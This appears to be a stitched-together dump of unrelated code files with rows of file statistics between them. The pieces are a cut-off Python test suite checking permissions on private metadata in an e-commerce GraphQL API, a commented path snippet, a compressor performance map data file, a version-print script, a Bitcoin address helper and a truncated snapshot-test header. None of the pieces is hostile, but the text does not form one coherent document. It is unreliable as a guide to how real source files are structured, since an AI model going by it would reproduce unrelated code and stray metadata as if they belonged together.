QUERY_COLLECTION_PRIVATE_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["collection"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
QUERY_DIGITAL_CONTENT_PRIVATE_META = """
query digitalContentMeta($id: ID!){
digitalContent(id: $id){
privateMetadata{
key
value
}
}
}
"""
def test_query_private_meta_for_digital_content_as_anonymous_user(
api_client, digital_content
):
# given
variables = {"id": graphene.Node.to_global_id("DigitalContent", digital_content.pk)}
# when
response = api_client.post_graphql(QUERY_DIGITAL_CONTENT_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_digital_content_as_customer(
user_api_client, digital_content
):
# given
digital_content.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
digital_content.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("DigitalContent", digital_content.pk)}
# when
response = user_api_client.post_graphql(
QUERY_DIGITAL_CONTENT_PRIVATE_META, variables
)
# then
assert_no_permission(response)
def test_query_private_meta_for_digital_content_as_staff(
staff_api_client, digital_content, permission_manage_products
):
# given
digital_content.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
digital_content.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("DigitalContent", digital_content.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_DIGITAL_CONTENT_PRIVATE_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["digitalContent"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
def test_query_private_meta_for_digital_content_as_service_account(
service_account_api_client, digital_content, permission_manage_products
):
# given
digital_content.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
digital_content.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("DigitalContent", digital_content.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_DIGITAL_CONTENT_PRIVATE_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["digitalContent"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
QUERY_PRODUCT_PRIVATE_META = """
query productsMeta($id: ID!){
product(id: $id){
privateMetadata{
key
value
}
}
}
"""
def test_query_private_meta_for_product_as_anonymous_user(api_client, product):
# given
variables = {"id": graphene.Node.to_global_id("Product", product.pk)}
# when
response = api_client.post_graphql(QUERY_PRODUCT_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_product_as_customer(user_api_client, product):
# given
variables = {"id": graphene.Node.to_global_id("Product", product.pk)}
# when
response = user_api_client.post_graphql(QUERY_PRODUCT_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_product_as_staff(
staff_api_client, product, permission_manage_products
):
# given
product.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
product.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("Product", product.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_PRODUCT_PRIVATE_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["product"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
def test_query_private_meta_for_product_as_service_account(
service_account_api_client, product, permission_manage_products
):
# given
product.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
product.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("Product", product.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_PRODUCT_PRIVATE_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["product"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
QUERY_PRODUCT_TYPE_PRIVATE_META = """
query productTypeMeta($id: ID!){
productType(id: $id){
privateMetadata{
key
value
}
}
}
"""
def test_query_private_meta_for_product_type_as_anonymous_user(
api_client, product_type
):
# given
variables = {"id": graphene.Node.to_global_id("ProductType", product_type.pk)}
# when
response = api_client.post_graphql(QUERY_PRODUCT_TYPE_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_product_type_as_customer(user_api_client, product_type):
# given
variables = {"id": graphene.Node.to_global_id("ProductType", product_type.pk)}
# when
response = user_api_client.post_graphql(QUERY_PRODUCT_TYPE_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_product_type_as_staff(
staff_api_client, product_type, permission_manage_products
):
# given
product_type.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
product_type.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("ProductType", product_type.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_PRODUCT_TYPE_PRIVATE_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["productType"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
def test_query_private_meta_for_product_type_as_service_account(
service_account_api_client, product_type, permission_manage_products
):
# given
product_type.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
product_type.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("ProductType", product_type.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_PRODUCT_TYPE_PRIVATE_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["productType"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
QUERY_PRODUCT_VARIANT_PRIVATE_META = """
query productVariantMeta($id: ID!){
productVariant(id: $id){
privateMetadata{
key
value
}
}
}
"""
def test_query_private_meta_for_product_variant_as_anonymous_user(api_client, variant):
# given
variant.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
variant.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("ProductVariant", variant.pk)}
# when
response = api_client.post_graphql(QUERY_PRODUCT_VARIANT_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_product_variant_as_customer(user_api_client, variant):
# given
variant.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
variant.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("ProductVariant", variant.pk)}
# when
response = user_api_client.post_graphql(
QUERY_PRODUCT_VARIANT_PRIVATE_META, variables
)
# then
assert_no_permission(response)
def test_query_private_meta_for_product_variant_as_staff(
staff_api_client, variant, permission_manage_products
):
# given
variant.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
variant.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("ProductVariant", variant.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_PRODUCT_VARIANT_PRIVATE_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["productVariant"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
def test_query_private_meta_for_product_variant_as_service_account(
service_account_api_client, variant, permission_manage_products
):
# given
variant.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
variant.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("ProductVariant", variant.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_PRODUCT_VARIANT_PRIVATE_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["productVariant"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
QUERY_SERVICE_ACCOUNT_PRIVATE_META = """
query serviceAccountMeta($id: ID!){
serviceAccount(id: $id){
privateMetadata{
key
value
}
}
}
"""
def test_query_private_meta_for_service_account_as_anonymous_user(
api_client, service_account
):
# given
variables = {"id": graphene.Node.to_global_id("ServiceAccount", service_account.pk)}
# when
response = api_client.post_graphql(QUERY_SERVICE_ACCOUNT_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_service_account_as_customer(
user_api_client, service_account
):
# given
variables = {"id": graphene.Node.to_global_id("ServiceAccount", service_account.pk)}
# when
response = user_api_client.post_graphql(
QUERY_SERVICE_ACCOUNT_PRIVATE_META, variables
)
# then
assert_no_permission(response)
def test_query_private_meta_for_service_account_as_staff(
staff_api_client, service_account, permission_manage_service_accounts
):
# given
service_account.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
service_account.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("ServiceAccount", service_account.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_SERVICE_ACCOUNT_PRIVATE_META,
variables,
[permission_manage_service_accounts],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["serviceAccount"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
def test_query_private_meta_for_service_account_as_service_account(
service_account_api_client, service_account, permission_manage_service_accounts
):
# given
service_account.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
service_account.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("ServiceAccount", service_account.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_SERVICE_ACCOUNT_PRIVATE_META,
variables,
[permission_manage_service_accounts],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["serviceAccount"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
| 30.092237
| 88
| 0.708863
| 9,132
| 78,300
| 5.649693
| 0.011608
| 0.043785
| 0.027678
| 0.04613
| 0.992073
| 0.98806
| 0.986859
| 0.985928
| 0.967864
| 0.959142
| 0
| 0.001622
| 0.18908
| 78,300
| 2,601
| 89
| 30.103806
| 0.81093
| 0.025428
| 0
| 0.774194
| 0
| 0
| 0.13019
| 0.002423
| 0
| 0
| 0
| 0
| 0.117889
| 1
| 0.069795
| false
| 0
| 0.001173
| 0
| 0.070968
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
812ded41e42dabb9c00b8c85add088817818b299
| 141
|
py
|
Python
|
src/prover/__init__.py
|
darrenlawton/automated_reasoning
|
9140d011be2ae364449cc86445803d9e05a6faf3
|
[
"MIT"
] | null | null | null |
src/prover/__init__.py
|
darrenlawton/automated_reasoning
|
9140d011be2ae364449cc86445803d9e05a6faf3
|
[
"MIT"
] | null | null | null |
src/prover/__init__.py
|
darrenlawton/automated_reasoning
|
9140d011be2ae364449cc86445803d9e05a6faf3
|
[
"MIT"
] | null | null | null |
# import os
# import sys
#
# sys.path.insert(0, os.path.join(
# os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'prover'))
| 23.5
| 78
| 0.673759
| 22
| 141
| 4.136364
| 0.5
| 0.263736
| 0.285714
| 0.32967
| 0.351648
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008065
| 0.120567
| 141
| 5
| 79
| 28.2
| 0.725806
| 0.921986
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4a0e6955ffe99f9535455bd03e3513bd0510002
| 8,699
|
py
|
Python
|
example_cycles/N+3ref/N3_LPC_map.py
|
swryan/pyCycleOld
|
fbab35b74d0e5487abe686ae0823ff52e75afb3b
|
[
"Apache-2.0"
] | null | null | null |
example_cycles/N+3ref/N3_LPC_map.py
|
swryan/pyCycleOld
|
fbab35b74d0e5487abe686ae0823ff52e75afb3b
|
[
"Apache-2.0"
] | null | null | null |
example_cycles/N+3ref/N3_LPC_map.py
|
swryan/pyCycleOld
|
fbab35b74d0e5487abe686ae0823ff52e75afb3b
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from pycycle.maps.map_data import MapData
"""Python version of CFM56 LPC map from NPSS"""
LPCmap = MapData()
# Map design point values
LPCmap.defaults = {}
LPCmap.defaults['alphaMap'] = 0.0
LPCmap.defaults['NcMap'] = 1.100
LPCmap.defaults['PR'] = 1.800
LPCmap.defaults['RlineMap'] = 2.200
LPCmap.RlineStall = 1.0
LPCmap.alphaMap = np.array([0.000, 1.000])
LPCmap.NcMap = np.array([0.300, 0.400, 0.500, 0.600, 0.700, 0.800, 0.900, 1.000, 1.100, 1.200, 1.250])
LPCmap.RlineMap = np.array([1.000, 1.200, 1.400, 1.600, 1.800, 2.000, 2.200, 2.400, 2.600, 2.800, 3.000, 3.200])
LPCmap.WcMap = np.array([[[ 38.0744, 42.9399, 47.7510, 52.5016, 57.1863, 61.7994, 66.3359, 70.7905, 75.1584, 76.5663, 76.5663, 76.5663],
[ 54.0383, 60.0388, 65.9233, 71.6816, 77.3038, 82.7808, 88.1038, 93.2648, 98.2565, 101.0545, 101.0545, 101.0545],
[ 70.3200, 77.5153, 84.4949, 91.2421, 97.7419, 103.9805, 109.9459, 115.6273, 121.0156, 124.6409, 124.6409, 124.6409],
[ 87.4860, 95.6896, 103.5393, 111.0128, 118.0907, 124.7566, 130.9971, 136.8019, 142.1633, 146.2312, 146.2312, 146.2312],
[105.8588, 114.8071, 123.2285, 131.0978, 138.3948, 145.1045, 151.2169, 156.7268, 161.6340, 165.7319, 165.7319, 165.7319],
[125.1164, 134.6062, 143.3572, 151.3454, 158.5548, 164.9773, 170.6127, 175.4677, 179.5554, 182.8951, 183.0717, 183.0717],
[144.4910, 154.5703, 163.6243, 171.6346, 178.5959, 184.5149, 189.4099, 193.3090, 196.2491, 198.2745, 198.4155, 198.4155],
[165.9141, 176.2228, 185.1849, 192.7986, 199.0806, 204.0644, 207.7979, 210.3410, 211.7638, 212.1506, 212.1506, 212.1506],
[188.5677, 198.3532, 206.6834, 213.5745, 219.0613, 223.1942, 226.0370, 227.6647, 228.1611, 228.1611, 228.1611, 228.1611],
[214.1402, 222.1943, 228.9021, 234.2963, 238.4220, 241.3359, 243.1030, 243.7959, 243.8124, 243.8124, 243.8124, 243.8124],
[227.8569, 234.5820, 240.1193, 244.5040, 247.7802, 250.0000, 251.2213, 251.5216, 251.5216, 251.5216, 251.5216, 251.5216]],
[[ 38.0744, 42.9399, 47.7510, 52.5016, 57.1863, 61.7994, 66.3359, 70.7905, 75.1584, 76.5663, 76.5663, 76.5663],
[ 54.0383, 60.0388, 65.9233, 71.6816, 77.3038, 82.7808, 88.1038, 93.2648, 98.2565, 101.0545, 101.0545, 101.0545],
[ 70.3200, 77.5153, 84.4949, 91.2421, 97.7419, 103.9805, 109.9459, 115.6273, 121.0156, 124.6409, 124.6409, 124.6409],
[ 87.4860, 95.6896, 103.5393, 111.0128, 118.0907, 124.7566, 130.9971, 136.8019, 142.1633, 146.2312, 146.2312, 146.2312],
[105.8588, 114.8071, 123.2285, 131.0978, 138.3948, 145.1045, 151.2169, 156.7268, 161.6340, 165.7319, 165.7319, 165.7319],
[125.1164, 134.6062, 143.3572, 151.3454, 158.5548, 164.9773, 170.6127, 175.4677, 179.5554, 182.8951, 183.0717, 183.0717],
[144.4910, 154.5703, 163.6243, 171.6346, 178.5959, 184.5149, 189.4099, 193.3090, 196.2491, 198.2745, 198.4155, 198.4155],
[165.9141, 176.2228, 185.1849, 192.7986, 199.0806, 204.0644, 207.7979, 210.3410, 211.7638, 212.1506, 212.1506, 212.1506],
[188.5677, 198.3532, 206.6834, 213.5745, 219.0613, 223.1942, 226.0370, 227.6647, 228.1611, 228.1611, 228.1611, 228.1611],
[214.1402, 222.1943, 228.9021, 234.2963, 238.4220, 241.3359, 243.1030, 243.7959, 243.8124, 243.8124, 243.8124, 243.8124],
[227.8569, 234.5820, 240.1193, 244.5040, 247.7802, 250.0000, 251.2213, 251.5216, 251.5216, 251.5216, 251.5216, 251.5216]]])
LPCmap.effMap = np.array([[[.7256, .7656, .7978, .8195, .8274, .8164, .7494, .5651, .1931, .0000, .0000, .0000],
[.7474, .7848, .8147, .8351, .8430, .8339, .7757, .6161, .3003, .0000, .0000, .0000],
[.7610, .7984, .8286, .8496, .8586, .8516, .7977, .6479, .3526, .0000, .0000, .0000],
[.7744, .8117, .8421, .8637, .8738, .8685, .8183, .6765, .3970, .0000, .0000, .0000],
[.7872, .8240, .8542, .8759, .8866, .8827, .8360, .7028, .4407, .0000, .0000, .0000],
[.7965, .8329, .8627, .8843, .8953, .8924, .8485, .7222, .4748, .0391, .0000, .0000],
[.7997, .8368, .8673, .8896, .9013, .8991, .8561, .7310, .4858, .0551, .0000, .0000],
[.8034, .8405, .8712, .8937, .9058, .9042, .8628, .7420, .5068, .0979, .0000, .0000],
[.8214, .8533, .8793, .8981, .9079, .9062, .8724, .7766, .5961, .2955, .0000, .0000],
[.8425, .8663, .8853, .8985, .9047, .9025, .8778, .8117, .6929, .5052, .2255, .0000],
[.8540, .8731, .8880, .8981, .9024, .9000, .8800, .8286, .7386, .6003, .4004, .1206]],
[[.7256, .7656, .7978, .8195, .8274, .8164, .7494, .5651, .1931, .0000, .0000, .0000],
[.7474, .7848, .8147, .8351, .8430, .8339, .7757, .6161, .3003, .0000, .0000, .0000],
[.7610, .7984, .8286, .8496, .8586, .8516, .7977, .6479, .3526, .0000, .0000, .0000],
[.7744, .8117, .8421, .8637, .8738, .8685, .8183, .6765, .3970, .0000, .0000, .0000],
[.7872, .8240, .8542, .8759, .8866, .8827, .8360, .7028, .4407, .0000, .0000, .0000],
[.7965, .8329, .8627, .8843, .8953, .8924, .8485, .7222, .4748, .0391, .0000, .0000],
[.7997, .8368, .8673, .8896, .9013, .8991, .8561, .7310, .4858, .0551, .0000, .0000],
[.8034, .8405, .8712, .8937, .9058, .9042, .8628, .7420, .5068, .0979, .0000, .0000],
[.8214, .8533, .8793, .8981, .9079, .9062, .8724, .7766, .5961, .2955, .0000, .0000],
[.8425, .8663, .8853, .8985, .9047, .9025, .8778, .8117, .6929, .5052, .2255, .0000],
[.8540, .8731, .8880, .8981, .9024, .9000, .8800, .8286, .7386, .6003, .4004, .1206]]])
LPCmap.PRmap = np.array([[[1.0423, 1.0412, 1.0393, 1.0367, 1.0333, 1.0292, 1.0234, 1.0151, 1.0043, 1.0000, 1.0000, 1.0000],
[1.0760, 1.0738, 1.0704, 1.0658, 1.0600, 1.0530, 1.0434, 1.0297, 1.0122, 1.0000, 1.0000, 1.0000],
[1.1215, 1.1180, 1.1127, 1.1055, 1.0965, 1.0856, 1.0707, 1.0497, 1.0228, 1.0000, 1.0000, 1.0000],
[1.1789, 1.1738, 1.1660, 1.1555, 1.1423, 1.1266, 1.1052, 1.0753, 1.0374, 1.0000, 1.0000, 1.0000],
[1.2494, 1.2422, 1.2312, 1.2167, 1.1986, 1.1771, 1.1481, 1.1078, 1.0572, 1.0000, 1.0000, 1.0000],
[1.3353, 1.3253, 1.3105, 1.2910, 1.2669, 1.2384, 1.2002, 1.1476, 1.0822, 1.0056, 1.0000, 1.0000],
[1.4411, 1.4282, 1.4088, 1.3830, 1.3512, 1.3136, 1.2632, 1.1942, 1.1088, 1.0101, 1.0000, 1.0000],
[1.5724, 1.5561, 1.5313, 1.4982, 1.4572, 1.4088, 1.3440, 1.2556, 1.1472, 1.0233, 1.0000, 1.0000],
[1.7323, 1.7101, 1.6785, 1.6379, 1.5888, 1.5318, 1.4572, 1.3572, 1.2358, 1.0982, 1.0000, 1.0000],
[1.9360, 1.9056, 1.8662, 1.8184, 1.7625, 1.6991, 1.6190, 1.5142, 1.3887, 1.2471, 1.0944, 1.0000],
[2.0507, 2.0158, 1.9729, 1.9223, 1.8645, 1.8000, 1.7201, 1.6176, 1.4958, 1.3584, 1.2098, 1.0546]],
[[1.0423, 1.0412, 1.0393, 1.0367, 1.0333, 1.0292, 1.0234, 1.0151, 1.0043, 1.0000, 1.0000, 1.0000],
[1.0760, 1.0738, 1.0704, 1.0658, 1.0600, 1.0530, 1.0434, 1.0297, 1.0122, 1.0000, 1.0000, 1.0000],
[1.1215, 1.1180, 1.1127, 1.1055, 1.0965, 1.0856, 1.0707, 1.0497, 1.0228, 1.0000, 1.0000, 1.0000],
[1.1789, 1.1738, 1.1660, 1.1555, 1.1423, 1.1266, 1.1052, 1.0753, 1.0374, 1.0000, 1.0000, 1.0000],
[1.2494, 1.2422, 1.2312, 1.2167, 1.1986, 1.1771, 1.1481, 1.1078, 1.0572, 1.0000, 1.0000, 1.0000],
[1.3353, 1.3253, 1.3105, 1.2910, 1.2669, 1.2384, 1.2002, 1.1476, 1.0822, 1.0056, 1.0000, 1.0000],
[1.4411, 1.4282, 1.4088, 1.3830, 1.3512, 1.3136, 1.2632, 1.1942, 1.1088, 1.0101, 1.0000, 1.0000],
[1.5724, 1.5561, 1.5313, 1.4982, 1.4572, 1.4088, 1.3440, 1.2556, 1.1472, 1.0233, 1.0000, 1.0000],
[1.7323, 1.7101, 1.6785, 1.6379, 1.5888, 1.5318, 1.4572, 1.3572, 1.2358, 1.0982, 1.0000, 1.0000],
[1.9360, 1.9056, 1.8662, 1.8184, 1.7625, 1.6991, 1.6190, 1.5142, 1.3887, 1.2471, 1.0944, 1.0000],
[2.0507, 2.0158, 1.9729, 1.9223, 1.8645, 1.8000, 1.7201, 1.6176, 1.4958, 1.3584, 1.2098, 1.0546]]])
#LPCmap.Nc_data, LPCmap.alpha_data, LPCmap.Rline_data = np.meshgrid(LPCmap.Nc_vals, LPCmap.alpha_vals, LPCmap.Rline_vals, sparse=False)
LPCmap.Npts = LPCmap.NcMap.size
LPCmap.units = {}
LPCmap.units['NcMap'] = 'rpm'
LPCmap.units['WcMap'] = 'lbm/s'
# format for new regular grid interpolator:
LPCmap.param_data = []
LPCmap.output_data = []
LPCmap.param_data.append({'name': 'alphaMap', 'values': LPCmap.alphaMap,
'default': 0, 'units': None})
LPCmap.param_data.append({'name': 'NcMap', 'values': LPCmap.NcMap,
'default': 1.1, 'units': 'rpm'})
LPCmap.param_data.append({'name': 'RlineMap', 'values': LPCmap.RlineMap,
'default': 2.2, 'units': None})
LPCmap.output_data.append({'name': 'WcMap', 'values': LPCmap.WcMap,
'default': np.mean(LPCmap.WcMap), 'units': 'lbm/s'})
LPCmap.output_data.append({'name': 'effMap', 'values': LPCmap.effMap,
'default': np.mean(LPCmap.effMap), 'units': None})
LPCmap.output_data.append({'name': 'PRmap', 'values': LPCmap.PRmap,
'default': 1.8, 'units': None})
| 75.643478
| 146
| 0.611794
| 1,583
| 8,699
| 3.352495
| 0.303222
| 0.045223
| 0.052007
| 0.052761
| 0.817599
| 0.798568
| 0.798568
| 0.785378
| 0.785378
| 0.785378
| 0
| 0.580527
| 0.149902
| 8,699
| 114
| 147
| 76.307018
| 0.13712
| 0.022876
| 0
| 0.5625
| 0
| 0
| 0.025802
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.020833
| 0
| 0.020833
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d4bbe1ea4deb5b327c259b2513376cefa41e0b19
| 53
|
py
|
Python
|
test.py
|
DongHenry/Py71
|
6e06cc4cda62daecba34ffbea4a8f03590a9098f
|
[
"MIT"
] | null | null | null |
test.py
|
DongHenry/Py71
|
6e06cc4cda62daecba34ffbea4a8f03590a9098f
|
[
"MIT"
] | null | null | null |
test.py
|
DongHenry/Py71
|
6e06cc4cda62daecba34ffbea4a8f03590a9098f
|
[
"MIT"
] | null | null | null |
import sys
print(sys.version_info)
print(sys.version)
| 17.666667
| 23
| 0.830189
| 9
| 53
| 4.777778
| 0.555556
| 0.372093
| 0.697674
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.056604
| 53
| 3
| 24
| 17.666667
| 0.86
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
d4f1d10585f7cc4b0e3f9a955cfc0ffa428a823b
| 2,266
|
py
|
Python
|
src/helper_bitcoin.py
|
BeholdersEye/PyBitmessage
|
362a975fbf1ec831d3107c7442527225bc140162
|
[
"MIT",
"BSD-2-Clause-FreeBSD"
] | 1,583
|
2015-01-01T13:03:20.000Z
|
2022-03-31T23:10:00.000Z
|
src/helper_bitcoin.py
|
BeholdersEye/PyBitmessage
|
362a975fbf1ec831d3107c7442527225bc140162
|
[
"MIT",
"BSD-2-Clause-FreeBSD"
] | 841
|
2015-01-01T14:51:48.000Z
|
2022-03-25T06:45:14.000Z
|
src/helper_bitcoin.py
|
BeholdersEye/PyBitmessage
|
362a975fbf1ec831d3107c7442527225bc140162
|
[
"MIT",
"BSD-2-Clause-FreeBSD"
] | 482
|
2015-01-07T00:53:25.000Z
|
2022-03-24T15:58:12.000Z
|
"""
Calculates bitcoin and testnet address from pubkey
"""
import hashlib
from debug import logger
from pyelliptic import arithmetic
def calculateBitcoinAddressFromPubkey(pubkey):
"""Calculate bitcoin address from given pubkey (65 bytes long hex string)"""
if len(pubkey) != 65:
logger.error('Could not calculate Bitcoin address from pubkey because'
' function was passed a pubkey that was'
' %i bytes long rather than 65.', len(pubkey))
return "error"
ripe = hashlib.new('ripemd160')
sha = hashlib.new('sha256')
sha.update(pubkey)
ripe.update(sha.digest())
ripeWithProdnetPrefix = '\x00' + ripe.digest()
checksum = hashlib.sha256(hashlib.sha256(
ripeWithProdnetPrefix).digest()).digest()[:4]
binaryBitcoinAddress = ripeWithProdnetPrefix + checksum
numberOfZeroBytesOnBinaryBitcoinAddress = 0
while binaryBitcoinAddress[0] == '\x00':
numberOfZeroBytesOnBinaryBitcoinAddress += 1
binaryBitcoinAddress = binaryBitcoinAddress[1:]
base58encoded = arithmetic.changebase(binaryBitcoinAddress, 256, 58)
return "1" * numberOfZeroBytesOnBinaryBitcoinAddress + base58encoded
def calculateTestnetAddressFromPubkey(pubkey):
"""This function expects that pubkey begin with the testnet prefix"""
if len(pubkey) != 65:
logger.error('Could not calculate Bitcoin address from pubkey because'
' function was passed a pubkey that was'
' %i bytes long rather than 65.', len(pubkey))
return "error"
ripe = hashlib.new('ripemd160')
sha = hashlib.new('sha256')
sha.update(pubkey)
ripe.update(sha.digest())
ripeWithProdnetPrefix = '\x6F' + ripe.digest()
checksum = hashlib.sha256(hashlib.sha256(
ripeWithProdnetPrefix).digest()).digest()[:4]
binaryBitcoinAddress = ripeWithProdnetPrefix + checksum
numberOfZeroBytesOnBinaryBitcoinAddress = 0
while binaryBitcoinAddress[0] == '\x00':
numberOfZeroBytesOnBinaryBitcoinAddress += 1
binaryBitcoinAddress = binaryBitcoinAddress[1:]
base58encoded = arithmetic.changebase(binaryBitcoinAddress, 256, 58)
return "1" * numberOfZeroBytesOnBinaryBitcoinAddress + base58encoded
| 39.754386
| 80
| 0.698147
| 210
| 2,266
| 7.533333
| 0.309524
| 0.027813
| 0.032238
| 0.051201
| 0.804046
| 0.804046
| 0.804046
| 0.804046
| 0.804046
| 0.804046
| 0
| 0.039576
| 0.208297
| 2,266
| 56
| 81
| 40.464286
| 0.842252
| 0.081642
| 0
| 0.837209
| 0
| 0
| 0.147358
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046512
| false
| 0.046512
| 0.069767
| 0
| 0.209302
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0783499fad46e7e8daed65a881a1c7fa7eb1fce8
| 61,589
|
py
|
Python
|
tests/snapshots/snap_test_holidata.py
|
vice/holidata
|
24c6d168516ea15f19de3858dde7e15ccb2276c9
|
[
"MIT"
] | null | null | null |
tests/snapshots/snap_test_holidata.py
|
vice/holidata
|
24c6d168516ea15f19de3858dde7e15ccb2276c9
|
[
"MIT"
] | null | null | null |
tests/snapshots/snap_test_holidata.py
|
vice/holidata
|
24c6d168516ea15f19de3858dde7e15ccb2276c9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
